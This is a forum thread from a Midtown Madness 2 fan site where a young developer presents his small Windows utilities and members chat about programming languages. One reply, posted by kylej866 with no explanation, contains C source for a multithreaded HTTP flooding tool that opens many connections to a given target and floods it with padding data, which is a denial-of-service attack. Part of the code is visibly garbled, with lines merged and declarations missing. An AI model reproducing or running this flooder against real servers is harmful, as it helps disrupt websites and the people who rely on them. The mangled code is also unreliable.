MNS - Creations Programs
Shows up Information about our programs
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
MNS - Creations Programs
Hi
Here we want show you our program projects.
We have already released two little programs. The MM2 Register Tool and the MM2 Lock Deleter.
But now we have finished another program the Screenshooter .NET.
It allows you to take shoots from your screen and it will save them automatic to 4 formats: BMP, JPEG, PNG, GIF .
Heres one Screenshot (taken with the Screenshoter .NET ):
https://mns-creations.gta-nightlife.de/img/pict0.jpg
Can you please post your opinions ?
Here we want show you our program projects.
We have already released two little programs. The MM2 Register Tool and the MM2 Lock Deleter.
But now we have finished another program the Screenshooter .NET.
It allows you to take shoots from your screen and it will save them automatic to 4 formats: BMP, JPEG, PNG, GIF .
Heres one Screenshot (taken with the Screenshoter .NET ):
https://mns-creations.gta-nightlife.de/img/pict0.jpg
Can you please post your opinions ?
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- Franch88
- MM2X Admin
- Posts: 15759
- Registered for: 17 years 5 months
- Location: Italy
- Been thanked: 1 time
- Contact:
You've made nice programs, great work. I like especially the latest one, the Screenshoter.NET, because is possible to save .jpg screenshots with the maximum quality, unlike Fraps. Soon at MM2X.
Nice tool the MM2 Register Tool, useful for not installed copies of MM2. The MM2 Lock Deleter isn't so useful for me, because the Maxoff's program MM2 Game Loader definitely solves the mm2.lock file problem, and not only that one. However, is better than another more old similar one.
Nice tool the MM2 Register Tool, useful for not installed copies of MM2. The MM2 Lock Deleter isn't so useful for me, because the Maxoff's program MM2 Game Loader definitely solves the mm2.lock file problem, and not only that one. However, is better than another more old similar one.
Fiat 500 = Italian motorization. Franch88, MM2 eXtreme forum and website Administrator.
|Franch88's MM2 Releases|
|Franch88's MM2 Releases|
- Silent1Unknown
- MM2X Super Active User
- Posts: 2472
- Registered for: 16 years 5 months
- Location: Canada
- Contact:
Nice program. As Franch said, it has the advantage over Fraps in that it can take HQ jpeg pics. Now I may not have to open Photoshop everytime to preserve the quality.
Question: Is this specific for games, just MM2, just desktop or anything at all?
Question: Is this specific for games, just MM2, just desktop or anything at all?
BEST MM2 SCREENSHOOTER | BEST PHOTOSHOPPER
MOST FRIENDLY MEMBER | BEST MM2 WEBSITE
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
sry for doublepost
but when franch released the program, it would be nice when you can post ideas to complete the programs with new features, functions or other.
that would be nice.
but when franch released the program, it would be nice when you can post ideas to complete the programs with new features, functions or other.
that would be nice.
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- Tonywolfe121
- MM2X Active User
- Posts: 502
- Registered for: 17 years 3 months
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
I use Visual Basic.
It's easy but effectly ^^
and i have already downloaded the decompiled exe
but it's difficult to appreciate the code without knowing about the c++ language.
It's easy but effectly ^^
and i have already downloaded the decompiled exe
but it's difficult to appreciate the code without knowing about the c++ language.
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
For me its ok you must think of that im only 14 years old
but also if i would be older i think not thats a kiddie language. you can do nearly exact the same like in c# .
i know c++ is a little enhanced, but for my purposes vb is fully sufficient
but also if i would be older i think not thats a kiddie language. you can do nearly exact the same like in c# .
i know c++ is a little enhanced, but for my purposes vb is fully sufficient
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- Tonywolfe121
- MM2X Active User
- Posts: 502
- Registered for: 17 years 3 months
Im 14 also
Cough
Cough
Code: Select all
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
//Lets greet him!
MessageBox.Show(Hi Maks12!);
// hmm now what?
//Meh lets end this xD
}
}
}
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
OK when you post code i will also post code
Code: Select all
Module Module1
'This is a console
Sub Main()
'OK so Let's greet tonywolfe121
'shows up a MessageBox with the text 'Hi tonywolfe121 :D', with the information icon and the information sound of windows, with the title 'Greetings'
MsgBox("Hi tonywolfe121 :D", MsgBoxStyle.Information, "Greetings")
'now the application will close
End Sub
End Module
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- kylej866
- MM2X Occasional User
- Posts: 388
- Registered for: 16 years 5 months
- Location: West Virginia, US
- Contact:
Code: Select all
#include "stdafx.h"
#include "winsock.h"
#include "string.h"
#include "stdio.h"
#include "windows.h"
#pragma comment(lib,"ws2_32")
DWORD WINAPI attack(LPVOID);
char target[256];
int main(int argc, char* argv[])
{
int l=0;
int j;
DWORD dw;
HANDLE hd;
if(argc<2)
{
printf("usage: %s target", argv[0]);
exit(0);
}
strncpy(target, argv[1], 256);
printf("Attaching %s ...\n", target);
for(j=0;j<50;j++)
hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
for(j=0;j<50>h_addr, host->h_length );
sck.sin_port = htons(80);
if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
{
printf("Socket couldn't be initiallized");
return -1;
}
if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
{
printf("Couldn't connect");
return -1;
}
sprintf(buff, "GET / HTTP/1.0\n");
//printf("%s",buff);
int len=strlen(buff);
if((send(s,buff,len,0))==-1)
{
printf ("send error");
closesocket(s);
return -1;
}
for(i=0;i<9999;i++)
{
if((send(s,space,strlen(space),0))==-1)
{
printf("Send Error on header number %d", i);
closesocket(s);
return -1;
}
}
closesocket(s);
return 0;
}
[url=https://biohazardgaming.net/kylejdesign/][img]https://i50.tinypic.com/bgz8nl.jpg[/img][/url]
- Maks12
- MM2X Junior User
- Posts: 70
- Registered for: 17 years 9 months
- Location: Germany - Berlin
- Contact:
wow
not bad ^^
I'm now installing visual studio 10 beta 1.
let's see what microsoft has changed.
i hope it will have a new ribbon bar control. ^^
but i think no.
so please on topic
Franch what do you think when do you release it here ?
not bad ^^
I'm now installing visual studio 10 beta 1.
let's see what microsoft has changed.
i hope it will have a new ribbon bar control. ^^
but i think no.
so please on topic
Franch what do you think when do you release it here ?
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]
- Franch88
- MM2X Admin
- Posts: 15759
- Registered for: 17 years 5 months
- Location: Italy
- Been thanked: 1 time
- Contact:
The Screenshoter.NET program is now available at MM2X here. There's no news at the home page because this isn't a program directly related with MM2.
For me this program is perfect how it is, no improvements needed. It's immediate and simple to use for the function for which it has been developed.
Good luck with your next ones, if you find interesting ideas.
For me this program is perfect how it is, no improvements needed. It's immediate and simple to use for the function for which it has been developed.
Good luck with your next ones, if you find interesting ideas.
Fiat 500 = Italian motorization. Franch88, MM2 eXtreme forum and website Administrator.
|Franch88's MM2 Releases|
|Franch88's MM2 Releases|